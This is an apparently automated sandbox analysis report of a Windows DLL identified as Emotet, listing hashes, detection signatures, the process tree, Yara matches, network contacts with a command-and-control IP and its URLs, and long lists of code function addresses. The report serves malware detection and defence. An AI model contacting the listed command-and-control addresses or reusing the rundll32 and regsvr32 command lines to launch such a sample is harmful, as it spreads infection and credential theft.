
Windows Analysis Report
2V7zjcga5L.dll

Overview

General Information

Sample Name: 2V7zjcga5L.dll
Analysis ID: 626492
MD5: b65d38f56203a50c2354abaa5af38aa4
SHA1: 81fb867e785b6e8505ca59b5de7f46d598a37fc3
SHA256: 18ad1fa8e0dcb3b64ff7ef042649fdc602668b4a0978f0351c98177162916139
Tags: exe, trojan

Detection

Emotet
Score: 76
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Detected potential crypto function
Found evasive API chain (may stop execution after checking a module file name)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Program does not show much activity (idle)
IP address seen in connection with other malware
PE file contains an invalid checksum
Tries to load missing DLLs
Drops PE files to the windows directory (C:\Windows)
Checks if the current process is being debugged
Registers a DLL
Queries disk information (often used to detect virtual machines)
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • loaddll64.exe (PID: 6984 cmdline: loaddll64.exe "C:\Users\user\Desktop\2V7zjcga5L.dll" MD5: 4E8A40CAD6CCC047914E3A7830A2D8AA)
    • cmd.exe (PID: 7048 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\2V7zjcga5L.dll",#1 MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • rundll32.exe (PID: 7104 cmdline: rundll32.exe "C:\Users\user\Desktop\2V7zjcga5L.dll",#1 MD5: 73C519F050C20580F8A62C849D49215A)
        • regsvr32.exe (PID: 5860 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\TvhlOU\CPyd.dll" MD5: D78B75FC68247E8A63ACBA846182740E)
    • regsvr32.exe (PID: 7092 cmdline: regsvr32.exe /s C:\Users\user\Desktop\2V7zjcga5L.dll MD5: D78B75FC68247E8A63ACBA846182740E)
    • rundll32.exe (PID: 7124 cmdline: rundll32.exe C:\Users\user\Desktop\2V7zjcga5L.dll,DllRegisterServer MD5: 73C519F050C20580F8A62C849D49215A)
    • rundll32.exe (PID: 5984 cmdline: rundll32.exe C:\Users\user\Desktop\2V7zjcga5L.dll,DllUnregisterServer MD5: 73C519F050C20580F8A62C849D49215A)
  • svchost.exe (PID: 6608 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6736 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4632 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4420 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5824 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4144 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000007.00000002.828897000.0000000000F30000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |
00000003.00000002.443771907.0000000001050000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |
00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |
00000005.00000002.443873760.0000000180001000.00000020.00001000.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |
00000004.00000002.447104613.00000230423C0000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |

Source | Rule | Description | Author | Strings
4.2.rundll32.exe.230423c0000.0.raw.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |
5.2.rundll32.exe.28dc9d20000.0.raw.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |
5.2.rundll32.exe.28dc9d20000.0.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |
3.2.regsvr32.exe.1050000.0.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |
7.2.regsvr32.exe.f30000.1.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |

No Sigma rule has matched
No Snort rule has matched



AV Detection

Source: 2V7zjcga5L.dll | Virustotal: Detection: 32%
Source: https://23.239.0.12/S9 | Avira URL Cloud: Label: malware
Source: https://23.239.0.12/w9 | Avira URL Cloud: Label: malware
Source: unknown | HTTPS traffic detected: 23.239.0.12:443 -> 192.168.2.5:49754 version: TLS 1.2
Source: 2V7zjcga5L.dll | Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: Binary string: msacm32.pdb | source: regsvr32.exe, 00000007.00000002.828634313.0000000000C95000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: msacm32.pdbGCTL | source: regsvr32.exe, 00000007.00000002.828634313.0000000000C95000.00000004.00000010.00020000.00000000.sdmp
Source: C:\Windows\System32\regsvr32.exe | Code function: 7_2_000000018000D26C FindFirstFileW,FindNextFileW,FindClose,7_2_000000018000D26C

Networking

Source: C:\Windows\System32\regsvr32.exe | Network Connect: 23.239.0.12 443
Source: Joe Sandbox View | ASN Name: LINODE-APLinodeLLCUS LINODE-APLinodeLLCUS
Source: Joe Sandbox View | JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Cookie: IGSITR=HJk2yqksn3jmOrlkjuqjRrOytL36Pszs0ofIX1jQk/Be1o+ZJK3BH16JgDf6yAW8We2QNZiNZF73x9i8Cr/2lwvuBtCMCqzhtUwH+utXxsaxxeFDiVcXHUnp3RcBPjBK+vqM6Yo3emfENRl9L6E53er+8Ox9ZdSnyBQfUVQqeHCdHLzs9KZ3O1oQ2HgwwRbSVRqsfC5SKTAY5vWLOF/LM1SbrwAwiegfKUsIcWEPMGL5FEJ++dJKJpd/eExNxiNWyzVFKkd3XdxdxGxunr8= | Host: 23.239.0.12 | Connection: Keep-Alive | Cache-Control: no-cache
Source: Joe Sandbox View | IP Address: 23.239.0.12 23.239.0.12
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown | Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown | TCP traffic detected without corresponding DNS query: 23.239.0.12
Source: regsvr32.exe, 00000007.00000003.501652096.0000000000ED3000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.828852768.0000000000ED3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.780383902.000001A1C4A63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.829069253.00000280A8B00000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: svchost.exe, 00000008.00000002.780383902.000001A1C4A63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.829009677.00000280A80ED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.ver)
Source: svchost.exe, 00000014.00000003.818773677.00000280A8B7A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.818709765.00000280A8B9B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://help.disneyplus.com.
Source: regsvr32.exe, 00000007.00000002.828762679.0000000000E61000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://23.239.0.12/
Source: regsvr32.exe, 00000007.00000003.501740704.0000000000E61000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.501820998.0000000000E61000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.828762679.0000000000E61000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://23.239.0.12/S9
Source: regsvr32.exe, 00000007.00000003.501740704.0000000000E61000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.501820998.0000000000E61000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.828762679.0000000000E61000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://23.239.0.12/s9
Source: regsvr32.exe, 00000007.00000003.501740704.0000000000E61000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.501820998.0000000000E61000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.828762679.0000000000E61000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://23.239.0.12/w9
Source: svchost.exe, 00000014.00000003.818773677.00000280A8B7A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.818709765.00000280A8B9B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://disneyplus.com/legal.
Source: svchost.exe, 00000014.00000003.815381462.00000280A9019000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.815281390.00000280A8BAC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.815239422.00000280A8B9B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.815120027.00000280A9002000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.815330686.00000280A8B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.815148701.00000280A9003000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://support.hotspotshield.com/
Source: svchost.exe, 00000014.00000003.818773677.00000280A8B7A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.818709765.00000280A8B9B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
Source: svchost.exe, 00000014.00000003.818773677.00000280A8B7A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.818709765.00000280A8B9B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
Source: svchost.exe, 00000014.00000003.815381462.00000280A9019000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.815281390.00000280A8BAC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.815239422.00000280A8B9B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.815120027.00000280A9002000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.815330686.00000280A8B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.815148701.00000280A9003000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.hotspotshield.com/terms/
Source: svchost.exe, 00000014.00000003.815381462.00000280A9019000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.815281390.00000280A8BAC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.815239422.00000280A8B9B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.815120027.00000280A9002000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.815330686.00000280A8B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.815148701.00000280A9003000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.pango.co/privacy
Source: svchost.exe, 00000014.00000003.822548470.00000280A9002000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.822494594.00000280A8B9B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.822517778.00000280A8B79000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.tiktok.com/legal/report/feedback
Source: C:\Windows\System32\regsvr32.exe | Code function: 7_2_00000001800132F0 InternetReadFile,RtlAllocateHeap,7_2_00000001800132F0

E-Banking Fraud

Source: Yara match | File source: 4.2.rundll32.exe.230423c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.rundll32.exe.28dc9d20000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.rundll32.exe.28dc9d20000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.regsvr32.exe.1050000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.regsvr32.exe.f30000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.regsvr32.exe.1050000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.regsvr32.exe.f30000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.rundll32.exe.230423c0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.828897000.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.443771907.0000000001050000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.443873760.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.447104613.00000230423C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.829091404.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.444094574.0000028DC9D20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.446272102.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\System32\rundll32.exe | File deleted: C:\Windows\System32\TvhlOU\CPyd.dll:Zone.Identifier
Source: C:\Windows\System32\regsvr32.exe | File created: C:\Windows\system32\JoOzHOkj\
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800179083_2_0000000180017908
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800215103_2_0000000180021510
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000F9173_2_000000018000F917
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000551C3_2_000000018000551C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000F1283_2_000000018000F128
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001CD383_2_000000018001CD38
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180016D3C3_2_0000000180016D3C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001F9443_2_000000018001F944
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800181483_2_0000000180018148
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001ED503_2_000000018001ED50
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800131503_2_0000000180013150
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001D9503_2_000000018001D950
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001E9603_2_000000018001E960
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180019D603_2_0000000180019D60
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180001D683_2_0000000180001D68
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001496C3_2_000000018001496C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180002D703_2_0000000180002D70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800021783_2_0000000180002178
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180024D803_2_0000000180024D80
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800185983_2_0000000180018598
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800035983_2_0000000180003598
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018002A9A83_2_000000018002A9A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800119A83_2_00000001800119A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180025DAC3_2_0000000180025DAC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180018DAC3_2_0000000180018DAC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800269B03_2_00000001800269B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800059B83_2_00000001800059B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800029BC3_2_00000001800029BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800141C03_2_00000001800141C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800125C43_2_00000001800125C4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800121CC3_2_00000001800121CC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000BDD03_2_000000018000BDD0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800075D43_2_00000001800075D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800095DC3_2_00000001800095DC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000F9E83_2_000000018000F9E8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800026103_2_0000000180002610
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800196183_2_0000000180019618
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180013E283_2_0000000180013E28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001FA383_2_000000018001FA38
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000A2703_2_000000018000A270
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180019E783_2_0000000180019E78
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001DA803_2_000000018001DA80
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800246983_2_0000000180024698
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000EE983_2_000000018000EE98
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800176B83_2_00000001800176B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001AAB83_2_000000018001AAB8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180011AD03_2_0000000180011AD0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180008AD83_2_0000000180008AD8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800296EC3_2_00000001800296EC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000A6EC3_2_000000018000A6EC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800132F03_2_00000001800132F0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800193003_2_0000000180019300
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001BB043_2_000000018001BB04
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018002870C3_2_000000018002870C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180026B103_2_0000000180026B10
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000131C3_2_000000018000131C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000671C3_2_000000018000671C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180029B283_2_0000000180029B28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180012F283_2_0000000180012F28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000BB283_2_000000018000BB28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001EB303_2_000000018001EB30
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800203343_2_0000000180020334
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800107583_2_0000000180010758
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001435C3_2_000000018001435C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180009F5C3_2_0000000180009F5C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800293683_2_0000000180029368
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800207683_2_0000000180020768
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800173783_2_0000000180017378
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800137803_2_0000000180013780
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800153883_2_0000000180015388
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000338C3_2_000000018000338C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000738C3_2_000000018000738C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800027903_2_0000000180002790
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180027F9C3_2_0000000180027F9C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800197A03_2_00000001800197A0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018002C7B43_2_000000018002C7B4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001DFB43_2_000000018001DFB4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001F7C03_2_000000018001F7C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800097C03_2_00000001800097C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800157D83_2_00000001800157D8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180019FDC3_2_0000000180019FDC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180017BDC3_2_0000000180017BDC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000F7E03_2_000000018000F7E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180001FE03_2_0000000180001FE0
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180010FF44_2_0000000180010FF4
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180028C204_2_0000000180028C20
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018002C0584_2_000000018002C058
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800091004_2_0000000180009100
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800079584_2_0000000180007958
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000C6084_2_000000018000C608
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800216184_2_0000000180021618
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180013E284_2_0000000180013E28
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001E3AC4_2_000000018001E3AC
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001DBE84_2_000000018001DBE8
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001FC0C4_2_000000018001FC0C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000580C4_2_000000018000580C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800220104_2_0000000180022010
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001481C4_2_000000018001481C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018002A42C4_2_000000018002A42C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800118344_2_0000000180011834
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800238314_2_0000000180023831
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180021C3C4_2_0000000180021C3C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000703C4_2_000000018000703C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000AC484_2_000000018000AC48
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000FC484_2_000000018000FC48
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800064584_2_0000000180006458
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001C05C4_2_000000018001C05C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001A4604_2_000000018001A460
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800298884_2_0000000180029888
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001D49C4_2_000000018001D49C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180008CA04_2_0000000180008CA0
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800248A84_2_00000001800248A8
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180015CB04_2_0000000180015CB0
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800124B44_2_00000001800124B4
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000C4B44_2_000000018000C4B4
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800288B84_2_00000001800288B8
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800024B84_2_00000001800024B8
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000D8C44_2_000000018000D8C4
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800250CC4_2_00000001800250CC
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800190D44_2_00000001800190D4
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180017CE44_2_0000000180017CE4
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800264F04_2_00000001800264F0
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800014F84_2_00000001800014F8
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180020CFC4_2_0000000180020CFC
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018002C9044_2_000000018002C904
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800179084_2_0000000180017908
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800215104_2_0000000180021510
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000F9174_2_000000018000F917
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000551C4_2_000000018000551C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000F1284_2_000000018000F128
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001CD384_2_000000018001CD38
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180016D3C4_2_0000000180016D3C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001F9444_2_000000018001F944
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800181484_2_0000000180018148
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001D9504_2_000000018001D950
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800131504_2_0000000180013150
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001ED504_2_000000018001ED50
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001E9604_2_000000018001E960
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180019D604_2_0000000180019D60
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001C9644_2_000000018001C964
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180001D684_2_0000000180001D68
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001496C4_2_000000018001496C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180002D704_2_0000000180002D70
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800021784_2_0000000180002178
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180024D804_2_0000000180024D80
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800185984_2_0000000180018598
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800035984_2_0000000180003598
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018002A9A84_2_000000018002A9A8
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800119A84_2_00000001800119A8
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180025DAC4_2_0000000180025DAC
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180018DAC4_2_0000000180018DAC
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800269B04_2_00000001800269B0
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800059B84_2_00000001800059B8
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800029BC4_2_00000001800029BC
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800141C04_2_00000001800141C0
